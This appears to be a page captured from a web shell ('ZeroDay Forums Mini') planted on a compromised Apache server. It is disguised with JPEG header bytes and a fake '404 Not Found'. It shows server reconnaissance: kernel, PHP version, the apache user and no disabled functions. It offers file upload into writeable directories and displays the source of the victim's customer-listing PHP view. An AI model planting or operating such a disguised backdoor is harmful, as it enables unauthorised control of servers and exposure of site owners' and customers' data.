����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/dashboard/views/customer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/adimi/application/modules/dashboard/views/customer/paid_customer.php
<?php defined('BASEPATH') OR exit('No direct script access allowed');?>
<!-- Paid Customer Start -->
<div class="content-wrapper">
	<section class="content-header">
	    <div class="header-icon">
	        <i class="pe-7s-note2"></i>
	    </div>
	    <div class="header-title">
	        <h1><?php echo display('paid_customer') ?></h1>
	        <small><?php echo display('paid_customer_list') ?></small>
	        <ol class="breadcrumb">
	            <li><a href="#"><i class="pe-7s-home"></i> <?php echo display('home') ?></a></li>
	            <li><a href="#"><?php echo display('customer') ?></a></li>
	            <li class="active"><?php echo display('paid_customer') ?></li>
	        </ol>
	    </div>
	</section>

	<section class="content">
		<!-- Alert Message -->
	    <?php
	        $message = $this->session->userdata('message');
	        if (isset($message)) {
	    ?>
	    <div class="alert alert-info alert-dismissable">
	        <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
	        <?php echo $message ?>                    
	    </div>
	    <?php 
	        $this->session->unset_userdata('message');
	        }
	        $error_message = $this->session->userdata('error_message');
	        if (isset($error_message)) {
	    ?>
	    <div class="alert alert-danger alert-dismissable">
	        <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
	        <?php echo $error_message ?>                    
	    </div>
	    <?php 
	        $this->session->unset_userdata('error_message');
	        }
	    ?>


	    <div class="row">
            <div class="col-sm-12">
                <div class="column">
                <?php if($this->permission->check_label('add_customer')->create()->access()){ ?>
                  <a href="<?php echo base_url('dashboard/Ccustomer')?>" class="btn btn-success m-b-5 m-r-2"><i class="ti-plus"> </i> <?php echo display('add_customer')?></a>
                <?php }if($this->permission->check_label('manage_customer')->read()->access()){ ?>
                  <a href="<?php echo base_url('dashboard/Ccustomer/manage_customer')?>" class="btn btn-info m-b-5 m-r-2"><i class="ti-align-justify"> </i> <?php echo display('manage_customer')?></a>
                <?php } ?>
                  <a href="<?php echo base_url('dashboard/Ccustomer/credit_customer')?>" class="btn btn-primary m-b-5 m-r-2"><i class="ti-align-justify"> </i> <?php echo display('credit_customer')?></a>

                </div>
            </div>
        </div>
	    
		<!-- Paid Customer -->
		<div class="row">
		    <div class="col-sm-12">
		        <div class="panel panel-bd lobidrag">
		            <div class="panel-heading">
		                <div class="panel-title">
		                    <h4><?php echo display('paid_customer') ?></h4>
		                </div>
		            </div>
		            <div class="panel-body">
		                <div class="table-responsive">
		                    <table id="dataTableExample2" class="table table-bordered table-striped table-hover">
		                    	<thead>
									<tr>
										<th><?php echo display('sl') ?></th>
										<th><?php echo display('customer_name') ?></th>
										<th><?php echo display('address') ?></th>
										<th><?php echo display('mobile') ?></th>
										<th class="text-right"><?php echo display('ammount') ?></th>
										<th class="text-center"><?php echo display('action') ?></th>
									</tr>
								</thead>
								<tbody>
								<?php if($customers_list){
								?>
									{customers_list}
										<tr>
											<td>{sl}</td>
											<td>
												<a href="<?php echo base_url().'dashboard/Ccustomer/customerledger/{customer_id}'; ?>">{customer_name}</a>				
											</td>
											<td>{customer_address}</td>
											<td>{customer_mobile}</td>
											<td  class="text-right"> <?php echo (($position==0)?"$currency {customer_balance}":"{customer_balance} $currency");?></td>
											<td>
												<center>
													<?php echo form_open()?>
														<a href="<?php echo base_url().'dashboard/Ccustomer/customer_update_form/{customer_id}'; ?>" class="btn btn-info btn-sm" data-toggle="tooltip" data-placement="left" title="<?php echo display('update') ?>"><i class="fa fa-pencil" aria-hidden="true"></i></a>

														<a href="" class="deleteCustomer btn btn-danger btn-sm" name="{customer_id}" data-toggle="tooltip" data-placement="right" title="" data-original-title="<?php echo display('delete') ?> "><i class="fa fa-trash-o" aria-hidden="true"></i></a>

													<?php echo form_close()?>
												</center>
											</td>
										</tr>
									{/customers_list}
								<?php
								}?>
								</tbody>
								<tfoot>
									<tr>
										<td  class="text-right" colspan="4"> <b><?php echo display('grand_total') ?></b></td>
										<td  class="text-right">
											<b><?php if ($subtotal) { echo (($position==0)?"$currency {subtotal}":"{subtotal} $currency");} ?></b>
										</td>
										<td></td>
									</tr>
								</tfoot>
							</table>
		                </div>
		            </div>
		        </div>
		    </div>
		</div>
	</section>
</div>
<!-- Paid Customer End -->
<script src="<?php echo MOD_URL.'dashboard/assets/js/paid_customer.js'; ?>"></script>

ZeroDay Forums Mini